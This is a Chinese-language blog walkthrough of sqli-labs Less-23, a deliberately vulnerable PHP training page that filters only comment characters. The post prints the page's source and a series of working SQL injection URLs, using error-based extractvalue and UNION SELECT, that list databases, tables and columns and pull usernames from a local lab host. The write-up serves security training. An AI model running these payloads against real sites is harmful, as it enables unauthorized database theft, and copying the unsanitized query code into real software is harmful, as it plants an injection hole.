2. 程式人生 > >sqli-labs————less 23(高階注入篇)

sqli-labs————less 23(高階注入篇)

阿新 發佈:2019-02-02

前言

從這一關開始,我們進進入了短暫的高階注入部分,這一部分中將會陸續介紹一些更為巧妙的注入技巧。

Less -23


檢視一下原始碼:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-23 **Error Based- no comments**</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome   <font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");

// take the variables 
if(isset($_GET['id']))
{
$id=$_GET['id'];

//filter the comments out so as to comments should not work
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 


$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font color= "#0000ff">';	
  	echo 'Your Login name:'. $row['username'];
  	echo "<br>";
  	echo 'Your Password:' .$row['password'];
  	echo "</font>";
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	print_r(mysql_error());
	echo "</font>";  
	}
}
	else { echo "Please input the ID as parameter with numeric value";}

?>
</font> </div></br></br></br><center>
<img src="../images/Less-23.jpg" /></center>
</body>
</html>
關鍵的sql執行語句:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);

從該SQL語句中我們可以看出如果我們要構造payload那麼我們需要做的就是閉合前面的單引號、同時閉合後面的單引號。


獲取mysql資料庫的basedir:


同時,這裡也可以使用報錯注入、延時注入:

報錯注入:

注入語句:

http://192.168.11.136/sqli-labs/Less-23?id=1'or extractvalue(1,concat(0x7e,database())) or '1'='1

獲取資料庫資訊:

http://192.168.11.136/sqli-labs/Less-23?id=-1'union select 1,(select group_concat(schema_name) from information_schema.schemata),'3


檢視資料庫security中的資料表:

注入語句:

http://192.168.11.136/sqli-labs/Less-23?id=-1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),'3


檢視user表中的所有列:

注入語句

http://192.168.11.136/sqli-labs/Less-23?id=-1'union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),'3

獲取表中資訊內容:

注入語句:

http://192.168.11.136/sqli-labs/Less-23?id=-1'union select 1,(select group_concat(username) from security.users limit 0,1),'3


至此,我們完成了一個基本的注入過程。

相關推薦

sqli-labs————less 23高階注入

前言從這一關開始,我們進進入了短暫的高階注入部分,這一部分中將會陸續介紹一些更為巧妙的注入技巧。Less -23檢視一下原始碼:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://

sqli-labs—————Less-1字元型注入

前言從這一篇文章開始,我們將開始真正的講解Sqli-libs中的各種注入,從第1階層開始,後續的內容會陸續放出,歡迎各位大佬的關注與評論!Less-1首先,開啟主頁進入第一關:可以看到提示,提示我們要傳入一個引數,名為ID,而且是資料型別,那麼我就傳入該引數看看到這裡,我們可

sqli-labs less 1 基於錯誤的GET單引號字元型注入

基礎知識: 常用url編碼:空格%20,單引號%27,雙引號%22,#號%23 mysql常用註釋符:#...  ,--空格...  ,/*...*/,--+(某些情況+可以代替空格,+瀏覽器會編碼成空格) 常用工具:火狐的hackbar concat函式:連線一個或

activiti 動態配置 activiti 監聽引擎啟動和初始化高階原始碼

1.1.1. 前言 使用者故事:現在有這樣一個需求,第一個需求:公司的開發環境,測試環境以及線上環境,我們使用的資料庫是不一樣的,我們必須能夠任意的切換資料庫進行測試和釋出,對資料庫連線字串我們需要加密,保證我們的資料庫連線不能被發現。必須確保我們的資料庫不能暴露出去,第二

Activiti 流程部署方式 activi 動態部署高階原始碼

Activiti的流程 部署方式有很多種方式,我們可以根據activit工作流引擎提供的ap方式進行部署。 當然了實際需求決定你要使用哪一種api操作,後面的總結詳細介紹了使用場景。 下面看一下部署方式。 流程部署的方式在類org.activiti.engine.rep

【20171101早】sqli-libs Less 23-28

try ext cat sql 其他 baidu https 查看 con Less 23:   題目:   分析:payload:http://192.168.162.135/sqli-libs/Less-23/?id=-1‘ union select

sqli-labs (less-8-less-10)

pos clas src 127.0.0.1 使用 mage lee 小菜 ascii 盲註需要掌握一些MySQL的相關函數:length(str):返回str字符串的長度。substr(str, pos, len):將str從pos位置開始截取len長度的字符進行返回

sqli-labs(less-11-16)

POST登入 首先試試 uname=admin'# & passwd=1 登入成功 如果不知道使用者名稱 ,註釋符被過濾,可以從password入手 一般第一個登陸欄位(一般是使用者名稱)就用註釋,第二個登陸欄位(一般就密碼)用閉合和註釋都是可以的 uname=test

sqli-labs less-17

concat 4.5 技術 name ati 沒有 count nts code less-17 uname=admin‘ #&passwd=a"")‘)都是秘密錯誤 試一下永真 uname=a&passwd=a‘ or 1=1 # uname=a&

ASP.NET Aries 高階開發教程:Excel匯入之程式碼編寫番外

前言: 以許框架提供的匯入配置功能,已經能解決95%以上的匯入情況,但有些情況總歸還是得程式碼來解決。 本篇介紹與匯入相關的程式碼。 1、前端追加匯入時Post的引數: var grid = new AR.DataGrid('V_Test', 'Demo_TestA'); //......

搭建sqli-labs環境來練習SQL注入

sqli-labs是什麼 SQLI-LABS是一個學習SQL注入的平臺: 基於錯誤的注入 (Union Select) String 字元型 Intiger 數字型 基於錯誤的注入 (基於雙注入) 盲注: 1.基於布林型的 2.基於時間

sqli-labs學習記錄

0x01 less-1 ‘$id’ 單引號注入 這裡寫程式碼片 http://localhost/sqli-labs-master/Less-1/?id=14' order by 3-- +

sqli-labs ————less -9

Less-9首先我們可以檢視一下原始碼:一方面:從標題中我們可以看到這是一個基於時間盲注的單引號注入另一方面:從之後的“print_r(mysql_error());”來看我們並不可以使用報錯注入最後,我們可以看到可以通過' and 1=1 --+或者' or 1=1 --+

redis 在 php 中的應用Sorted-set

區間 arr 基數 計算 元素 store size count body 上一篇:redis 在 php 中的應用(Set篇) 本文為我閱讀了 redis參考手冊 之後編寫,註意 php_redis 和 redis-cli 的區別(主要是返回值類型和參數用法) Redis

Mysql 入門,增刪改查進階

bsp com pre sco height name 數據 mysql from 主要已以下兩個表students與students_score,進行數據的增刪改查操作! 1、SELECT 1)select id,tel from students

2017-06-23chmod whoami chown

nbsp mode img .cn eight 設定 splay 文件名 block 文件權限設定 chmod u-x newfile chmod u-x,g+w newfile chmod a=rwx newfile 【mode=421

freenas的CIFS/SMB的使用進階

img 大小 ifs 退出 freenas 什麽 數據 用戶名 鏡像 這裏是對freenas的進一步使用,關於freenas的介紹與安裝請查看上一篇隨筆:http://www.cnblogs.com/hjc4025/p/7079364.html 我們先來看一下如何使用fre

實踐課-------第九

視圖 clas 環境配置 項目 開源 nfa nco ext contex 通過這十天的框架搭建學習,學會了環境配置,及其測試,得出以下總結 1.創建WEB工程添加struts支持 2.分包 3添加spring支持 4.添加spring配置文件 5.在web.x

淺談前端移動端頁面開發布局

避免 tor 所有 還記得 問題 影響 字符串 ble 開發者 前言的一些碎碎念:最近一直在寫移動端的頁面,不過一直是用的別人造好的輪子,很多時候並沒有想那是為什麽,那是怎麽樣要那麽寫,就跟著別人的文檔去了。本以為自己對移動端的那一丟丟理解,結果很多東西都特麽有問題

ftk學習記輸入框

file creat 之前 egl init -s 自己 效果 ast 【 聲明:版權全部。歡迎轉載。請勿用於商業用途。 聯系信箱:feixiaoxing @163.com】 昨天講了進度條,我們還是看看它的運行效果是怎麽樣的。截圖例如以下, 進度條使用的